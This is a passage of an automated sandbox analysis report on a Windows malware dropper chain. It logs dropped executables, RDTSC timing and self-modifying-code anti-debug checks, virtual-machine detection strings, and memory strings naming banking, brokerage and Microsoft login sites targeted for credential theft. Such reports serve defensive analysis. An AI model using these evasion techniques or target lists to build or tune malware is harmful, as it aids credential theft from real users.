Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6912C6 second address: 6912D0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3838D0CF46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6915E4 second address: 6915F6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnc 00007F3838E06D16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 691A27 second address: 691A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 691A2B second address: 691A35 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3838E06D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 61596B second address: 61596F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 699F64 second address: 699F68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 699F68 second address: 699F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 699F70 second address: 699F7E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F3838E06D16h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 699B2B second address: 699B31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 699B31 second address: 699B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3838E06D1Ah 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 69A802 second address: 69A81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3838D0CF52h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 69A81B second address: 69A823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 69A823 second address: 69A827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Special instruction interceptor: First address: A5D74C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Special instruction interceptor: First address: ABD8A6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Special instruction interceptor: First address: 4B2CB3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Special instruction interceptor: First address: 65CA27 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Special instruction interceptor: First address: 4B032E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Special instruction interceptor: First address: 683FD9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Special instruction interceptor: First address: 66C88A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Special instruction interceptor: First address: 6E050B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Special instruction interceptor: First address: FF6C5D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Special instruction interceptor: First address: 11BEDE8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Special instruction interceptor: First address: FF6B5F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Special instruction interceptor: First address: 11A7659 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Special instruction interceptor: First address: 122A46D instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Memory allocated: 2690000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Memory allocated: 2820000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Memory allocated: 4820000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Memory allocated: 1640000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Memory allocated: 3290000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Memory allocated: 16B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Memory allocated: 2270000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Memory allocated: 24F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Memory allocated: 2300000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Memory allocated: B30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Memory allocated: 2AA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Memory allocated: EE0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe

Code function: 13_2_04D205B6 rdtsc

13_2_04D205B6

Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 363	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Window / User API: threadDelayed 2895
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Window / User API: threadDelayed 5622

Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14082\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10077730101\JCFx2xj.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14082\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14082\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WinTemp\Microsoft Edge Protect.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14082\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14082\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14082\python312.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14082\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\JCFx2xj[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14082\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14082\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14082\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14082\unicodedata.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-2573

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	API coverage: 4.5 %
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	API coverage: 1.9 %
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	API coverage: 2.1 %

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe TID: 7116	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5648	Thread sleep count: 363 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5648	Thread sleep time: -10890000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5648	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe TID: 820	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe TID: 7120	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe TID: 4828	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe TID: 5924	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe TID: 6380	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe TID: 3260	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe TID: 6464	Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe TID: 6464	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe TID: 3876	Thread sleep count: 2895 > 30
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe TID: 3876	Thread sleep count: 5622 > 30
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe TID: 2052	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Code function: 0_2_00CF2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00CF2390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00FAEF71 FindFirstFileExW,	2_2_00FAEF71
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_004AEF71 FindFirstFileExW,	6_2_004AEF71
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_004AEF71 FindFirstFileExW,	14_2_004AEF71
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_004AEF71 FindFirstFileExW,	15_2_004AEF71

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe

Code function: 0_2_00CF5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

0_2_00CF5467

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	File opened: C:\Users\user~1\	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	File opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	File opened: C:\Users\user~1\AppData\Local\Temp\	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	File opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	File opened: C:\Users\user~1\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	File opened: C:\Users\user~1\AppData\	Jump to behavior

Source: 2X0520.exe, 2X0520.exe, 00000008.00000002.1526343051.0000000000A13000.00000040.00000001.01000000.00000009.sdmp, KI2Q1PIQVVVTNGJPW8.exe, KI2Q1PIQVVVTNGJPW8.exe, 0000000D.00000002.1583103203.000000000063C000.00000040.00000001.01000000.0000000B.sdmp, JqGBbm7.exe, JqGBbm7.exe, 00000013.00000002.2399208820.0000000001175000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: bPDDW9F.exe, 00000018.00000002.2538285280.000001E1C5A3C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@{
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: KI2Q1PIQVVVTNGJPW8.exe, 0000000D.00000002.1583926844.00000000010E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\N
Source: 1s89v4.exe, 00000002.00000003.1269043739.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&s
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: rapes.exe, 0000000F.00000002.2538825426.00000000015F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW2
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 2X0520.exe, 00000008.00000003.1331134331.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1396132150.0000000001147000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000002.1531040951.000000000110C000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1385483236.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1395821864.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000002.1531426970.0000000001148000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1494460340.0000000001148000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1385575677.000000000113F000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1525427273.0000000001147000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1307172938.000000000113F000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1524873724.000000000113D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 2X0520.exe, 00000008.00000003.1331134331.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1396132150.0000000001147000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1385483236.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1395821864.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000002.1531426970.0000000001148000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1494460340.0000000001148000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1385575677.000000000113F000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1525427273.0000000001147000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1307172938.000000000113F000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1524873724.000000000113D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: JqGBbm7.exe, 00000013.00000003.2361359342.000000000131E000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2318540877.0000000001334000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2070247901.0000000001334000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2360737616.000000000131E000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2319508434.0000000001334000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2397198846.000000000131A000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2349507633.000000000131C000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2397700783.000000000131C000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000002.2400981664.000000000131E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW*
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696492231p
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: d0HNrLB.exe, 0000001A.00000002.2540916192.0000000001346000.00000004.00000020.00020000.00000000.sdmp, d0HNrLB.exe, 00000022.00000002.2465071196.0000000000B97000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: khykuQw.exe, 00000016.00000003.2512732601.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2366858553.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000002.2515188003.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2452462854.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2268651969.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2500679673.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: JqGBbm7.exe, 00000013.00000003.2397198846.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000002.2400762628.00000000012EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWPz3
Source: 3Mv6i65.exe, 00000015.00000002.2544921210.000001ED4F276000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWmed %SystemRoot%\system32\mswsock.dll(
Source: 2X0520.exe, 00000008.00000002.1526343051.0000000000A13000.00000040.00000001.01000000.00000009.sdmp, KI2Q1PIQVVVTNGJPW8.exe, 0000000D.00000002.1583103203.000000000063C000.00000040.00000001.01000000.0000000B.sdmp, JqGBbm7.exe, 00000013.00000002.2399208820.0000000001175000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: khykuQw.exe, 00000016.00000003.2330909994.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

